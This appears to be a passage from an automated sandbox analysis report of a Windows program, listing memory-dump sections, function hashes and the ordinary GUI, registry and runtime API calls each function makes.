                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                • String ID:
                                                                                • API String ID: 2853195852-0
                                                                                • Opcode ID: a24a239a354e0897e523d9194e65b36781a21d75f395cf80825046c93ed437a3
                                                                                • Instruction ID: c811231deb8078fb5731fa9dc182fa536aa2240df244b5e80c63169bc604b0b0
                                                                                • Opcode Fuzzy Hash: a24a239a354e0897e523d9194e65b36781a21d75f395cf80825046c93ed437a3
                                                                                • Instruction Fuzzy Hash: 0941A230B043519BD720EF26E848E1BBAE4EFC5B15F90092EF88186251CB79D945CB9B
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • SetBkColor.GDI32(?), ref: 00426D7D
                                                                                • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 00426DCA
                                                                                • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 00426DF9
                                                                                • SetBkColor.GDI32(?,?), ref: 00426E17
                                                                                • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 00426E42
                                                                                • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 00426E7C
                                                                                • SetBkColor.GDI32(?,00000000), ref: 00426E84
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Text$Color
                                                                                • String ID:
                                                                                • API String ID: 3751486306-0
                                                                                • Opcode ID: 2321da43b585f63e5adc61c20e03b6cb190c2bb4a675cc279752b46e515c9837
                                                                                • Instruction ID: 29269f7e8968f07c9bf61daa0b8dde85a5b1c8a61ab52b3db714b3b204068679
                                                                                • Opcode Fuzzy Hash: 2321da43b585f63e5adc61c20e03b6cb190c2bb4a675cc279752b46e515c9837
                                                                                • Instruction Fuzzy Hash: 2D416874644301AFE320DF18DC86F2AB7E4FB89B00F544819FA54AA2C0D775E909CB6A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: D
                                                                                • API String ID: 0-193714618
                                                                                • Opcode ID: 0ca42e1e0f1a058a706f251ac6bea548b4148dc182a2db42e612ab69b8c37870
                                                                                • Instruction ID: c63cc33246c587ca8770534a01517a3441ccaac5100645c49687a50044a75eae
                                                                                • Opcode Fuzzy Hash: 0ca42e1e0f1a058a706f251ac6bea548b4148dc182a2db42e612ab69b8c37870
                                                                                • Instruction Fuzzy Hash: 25316BB56041608FE364DF2EF845E2677A1FBB2302FD386BBE501863A1C7749845CB28
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: MessageSend$ActiveCaptureFocusLastPopup
                                                                                • String ID:
                                                                                • API String ID: 3219385341-0
                                                                                • Opcode ID: a185fa5899d7e6cd108c07e537715c4c03c8680ac7ec32e9d6a7e3673663cfde
                                                                                • Instruction ID: 67b33c1f3fcca2755b6cfe87239e2cbfe8c3daf4c24fd7378bf085f00ddaf3be
                                                                                • Opcode Fuzzy Hash: a185fa5899d7e6cd108c07e537715c4c03c8680ac7ec32e9d6a7e3673663cfde
                                                                                • Instruction Fuzzy Hash: 521106722002197BC2106F75DCD4C3F3A6CDB99799B12152BFA0193241EF2DDD020979
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetWindowRect.USER32 ref: 00428730
                                                                                • GetWindowLongA.USER32 ref: 00428739
                                                                                • InflateRect.USER32(?,00000001,00000001), ref: 00428798
                                                                                • GetParent.USER32(?), ref: 0042879F
                                                                                • ScreenToClient.USER32 ref: 004287B3
                                                                                • ScreenToClient.USER32 ref: 004287BB
                                                                                • InvalidateRect.USER32(00000000,?,00000000), ref: 004287D1
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Rect$ClientScreenWindow$InflateInvalidateLongParent
                                                                                • String ID:
                                                                                • API String ID: 1809568455-0
                                                                                • Opcode ID: ff58344ce4431b79c43a51446caebed1801a8451d6a741497eb264a90b017220
                                                                                • Instruction ID: 20c8bc178c7abd827cf01e77227cc194a637bdb18fb4d08b38def5b058213ab6
                                                                                • Opcode Fuzzy Hash: ff58344ce4431b79c43a51446caebed1801a8451d6a741497eb264a90b017220
                                                                                • Instruction Fuzzy Hash: 37216831200215AFD704DE24EC94FBF73A9EB84721FA4451EF95187291DB38D945CB26
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,?,00000000), ref: 00431EBF
                                                                                • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 00431EE2
                                                                                • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 00431F01
                                                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00431F11
                                                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00431F1B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CloseCreate$Open
                                                                                • String ID: software
                                                                                • API String ID: 1740278721-2010147023
                                                                                • Opcode ID: d301fab7d3179a1598cf324ef04d6cc726fa06f4650e103ed108139ac8e274de
                                                                                • Instruction ID: 6881e489369482dd9ae8addcb6160e6be127bead988f30fed154f04994d284f0
                                                                                • Opcode Fuzzy Hash: d301fab7d3179a1598cf324ef04d6cc726fa06f4650e103ed108139ac8e274de
                                                                                • Instruction Fuzzy Hash: C211C876900158FBDB11DF96DC84DEFFFBCEF89705F1040AAA614A2121D7719A40DB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 00421AEE
                                                                                • GetSystemMetrics.USER32 ref: 00421B06
                                                                                • GetSystemMetrics.USER32 ref: 00421B0D
                                                                                • lstrcpyA.KERNEL32(-00000028,DISPLAY,00000028), ref: 00421B31
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: System$Metrics$InfoParameterslstrcpy
                                                                                • String ID: B$DISPLAY
                                                                                • API String ID: 1409579217-3316187204
                                                                                • Opcode ID: 8cad83c6f743450e3fdde37e0a3d9be14beebfde26e84af3a6a668d28f9e0a32
                                                                                • Instruction ID: 83b49fd69f23a198b78ee952632538a78eaeacc0175bbffe35e1a6aa65712b2e
                                                                                • Opcode Fuzzy Hash: 8cad83c6f743450e3fdde37e0a3d9be14beebfde26e84af3a6a668d28f9e0a32
                                                                                • Instruction Fuzzy Hash: 0E11E371700234ABCF11AF14ACC099BBFB8EF15741B408023FC059A155D675E950CBA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Rect$ClientScreenWindow$InflateLongParentValidate
                                                                                • String ID:
                                                                                • API String ID: 2275295265-0
                                                                                • Opcode ID: 957877f3f5afc6908445e749f0dad9caa24f55e73f036510a5f03152ef45642a
                                                                                • Instruction ID: 3d41a9fa32de68a1825794a1396603118b0ea0ebdba66c71a7a3a18a2ddaf4b8
                                                                                • Opcode Fuzzy Hash: 957877f3f5afc6908445e749f0dad9caa24f55e73f036510a5f03152ef45642a
                                                                                • Instruction Fuzzy Hash: 87F06D32104201BFD301AB54DC88DBFB7BCEB89722F00852DF91592150DA34990A8B66
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetSysColor.USER32(0000000F), ref: 0042F189
                                                                                • GetSysColor.USER32(00000010), ref: 0042F190
                                                                                • GetSysColor.USER32(00000014), ref: 0042F197
                                                                                • GetSysColor.USER32(00000012), ref: 0042F19E
                                                                                • GetSysColor.USER32(00000006), ref: 0042F1A5
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 0042F1B2
                                                                                • GetSysColorBrush.USER32(00000006), ref: 0042F1B9
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Color$Brush
                                                                                • String ID:
                                                                                • API String ID: 2798902688-0
                                                                                • Opcode ID: ef6c72bd6de09845801589dab9e2aaec3edf9995b9614f7a3fa1260c4579e344
                                                                                • Instruction ID: d78636e8a5eb0386f628ab24f1ef28342faacb0a612bbd47625186426cd1d966
                                                                                • Opcode Fuzzy Hash: ef6c72bd6de09845801589dab9e2aaec3edf9995b9614f7a3fa1260c4579e344
                                                                                • Instruction Fuzzy Hash: B7F01C719407489BD770BF729D09B47BAE0FFC4B10F02192EE2858BA90E6B5E400DF44
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Version$MessageRegisterWindow
                                                                                • String ID: MSWHEEL_ROLLMSG
                                                                                • API String ID: 303823969-2485103130
                                                                                • Opcode ID: 19a6eabf374e2be0c850858076a1e1aaff4f111db88cdfbf779a8f123a7320ca
                                                                                • Instruction ID: d50d5e0e0bb33240a66e5835f70dac281e63486b5a77f32b3608b1497903ffd4
                                                                                • Opcode Fuzzy Hash: 19a6eabf374e2be0c850858076a1e1aaff4f111db88cdfbf779a8f123a7320ca
                                                                                • Instruction Fuzzy Hash: B7E07D3FC1002652D7212B34AC103BB66905B4C792F102237DD01433148B3C6C834EBE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetStringTypeW.KERNEL32(00000001,0044165C,00000001,00000000,?,00000100,00000000,00423634,00000001,00000020,00000100,?,00000000), ref: 004260AF
                                                                                • GetStringTypeA.KERNEL32(00000000,00000001,00441658,00000001,00000000,?,00000100,00000000,00423634,00000001,00000020,00000100,?,00000000), ref: 004260C9
                                                                                • GetStringTypeA.KERNEL32(00000000,?,00000100,00000020,00000001,?,00000100,00000000,00423634,00000001,00000020,00000100,?,00000000), ref: 004260FD
                                                                                • MultiByteToWideChar.KERNEL32(00423634,00000101,00000100,00000020,00000000,00000000,?,00000100,00000000,00423634,00000001,00000020,00000100,?,00000000), ref: 00426135
                                                                                • MultiByteToWideChar.KERNEL32(00423634,00000001,00000100,00000020,?,00000100,?,00000100,00000000,00423634,00000001,00000020,00000100,?), ref: 0042618B
                                                                                • GetStringTypeW.KERNEL32(?,?,00000000,00000001,?,00000100,?,00000100,00000000,00423634,00000001,00000020,00000100,?), ref: 0042619D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: StringType$ByteCharMultiWide
                                                                                • String ID:
                                                                                • API String ID: 3852931651-0
                                                                                • Opcode ID: 59748287636e8570e7ad67949cba3cbdb9fc7e4a4e9d5ec6e9b50b3242a928ce
                                                                                • Instruction ID: 9382fd85796dd67fbf0c92637a15368fee418da6a84cedbd761d260dce6618ce
                                                                                • Opcode Fuzzy Hash: 59748287636e8570e7ad67949cba3cbdb9fc7e4a4e9d5ec6e9b50b3242a928ce
                                                                                • Instruction Fuzzy Hash: C3419C72640229AFDF218F95EC85EAF3F78FB09310F514526F911D2250D3389D60DB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • TlsGetValue.KERNEL32(0044DC44,0044D8DC,00000000,?,0044DC44,?,004319AC,0044D8DC,00000000,?,00000000,004311A7,00430872,004311C3,0042E17A,0042F3B4), ref: 0043174F
                                                                                • EnterCriticalSection.KERNEL32(0044DC60,00000010,?,0044DC44,?,004319AC,0044D8DC,00000000,?,00000000,004311A7,00430872,004311C3,0042E17A,0042F3B4), ref: 0043179E
                                                                                • LeaveCriticalSection.KERNEL32(0044DC60,00000000,?,0044DC44,?,004319AC,0044D8DC,00000000,?,00000000,004311A7,00430872,004311C3,0042E17A,0042F3B4), ref: 004317B1
                                                                                • LocalAlloc.KERNEL32(00000000,00000004,?,0044DC44,?,004319AC,0044D8DC,00000000,?,00000000,004311A7,00430872,004311C3,0042E17A,0042F3B4), ref: 004317C7
                                                                                • LocalReAlloc.KERNEL32(?,00000004,00000002,?,0044DC44,?,004319AC,0044D8DC,00000000,?,00000000,004311A7,00430872,004311C3,0042E17A,0042F3B4), ref: 004317D9
                                                                                • TlsSetValue.KERNEL32(0044DC44,00000000), ref: 00431815
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: AllocCriticalLocalSectionValue$EnterLeave
                                                                                • String ID:
                                                                                • API String ID: 4117633390-0
                                                                                • Opcode ID: 176ef3cb3ee011ffd4a2ff260397a4d4b3dc451f129d16ba960b8dabedcd6b1b
                                                                                • Instruction ID: 248ff2318b4a829e3e7c924d3f50418c1acf93343be7b1b9815e4c657b860e75
                                                                                • Opcode Fuzzy Hash: 176ef3cb3ee011ffd4a2ff260397a4d4b3dc451f129d16ba960b8dabedcd6b1b
                                                                                • Instruction Fuzzy Hash: F831DD31200204EFDB24DF59C889F6AB7F8FB49325F10D52AE856C7660DB78E905CB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 00429B58
                                                                                • GetWindowTextLengthA.USER32 ref: 00429B62
                                                                                • GetWindowTextA.USER32 ref: 00429B8A
                                                                                • SetTextColor.GDI32(?,00000000), ref: 00429BCB
                                                                                • DrawTextA.USER32(?,00000000,000000FF,?,?), ref: 00429BE3
                                                                                • SetTextColor.GDI32(?,?), ref: 00429BF5
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Text$ColorWindow$DrawLength
                                                                                • String ID:
                                                                                • API String ID: 1177705772-0
                                                                                • Opcode ID: fdb8d14a43ec11e52fd7995167efdf4abd8909a614c0f787fc5d03afb46595f8
                                                                                • Instruction ID: 8ec3f89335e3202dbb25254b2851aa3520f65dd38009491273cc3397e315894a
                                                                                • Opcode Fuzzy Hash: fdb8d14a43ec11e52fd7995167efdf4abd8909a614c0f787fc5d03afb46595f8
                                                                                • Instruction Fuzzy Hash: 4A216B76600119AFC714CF58ED88ABBBBB9FB88311F148259FD5987394CA34EE00CB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: MessageSend$CaptureH_prologHelp
                                                                                • String ID:
                                                                                • API String ID: 432264411-0
                                                                                • Opcode ID: ba773ec43775c7fc1d74b7c27bc189f3316abd4acbafee2c8573ca4eafd45aff
                                                                                • Instruction ID: 53e3a261e3f671fc665b5f2ffaba15c297177ae2ac9ffc412a811d478b2d602a
                                                                                • Opcode Fuzzy Hash: ba773ec43775c7fc1d74b7c27bc189f3316abd4acbafee2c8573ca4eafd45aff
                                                                                • Instruction Fuzzy Hash: 9B21B270700219BFEB206F61DC85FBEB7A9EF48754F50852AB211AB1E2CBB49C009B54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                • String ID:
                                                                                • API String ID: 670545878-0
                                                                                • Opcode ID: db42b04487f1006e0edf718da1ec4efdf9e3e5e7407ecc3142b4ed8f900e6900
                                                                                • Instruction ID: 02b773ae430f8cdeaeeb8ce1c1956de65846d001529350d58519189c4a8cbdc9
                                                                                • Opcode Fuzzy Hash: db42b04487f1006e0edf718da1ec4efdf9e3e5e7407ecc3142b4ed8f900e6900
                                                                                • Instruction Fuzzy Hash: BF11CA3260133157C6315A695CA0B2FB2985F7DB56F056357EE00D7310DB68CE0186ED
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                • String ID:
                                                                                • API String ID: 1315500227-0
                                                                                • Opcode ID: 5a179ac777b3a794dc958dc315328cd6e58d4136817739a7159f7293b13e5f27
                                                                                • Instruction ID: 3c1efa09d937633bc9f27efae014d622fb028056f8d53b6a67e7047749811959
                                                                                • Opcode Fuzzy Hash: 5a179ac777b3a794dc958dc315328cd6e58d4136817739a7159f7293b13e5f27
                                                                                • Instruction Fuzzy Hash: 36018F32200129BBDB125F64EC08EAF777CEF40712F858032FD11961B1E738CA1A8B98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
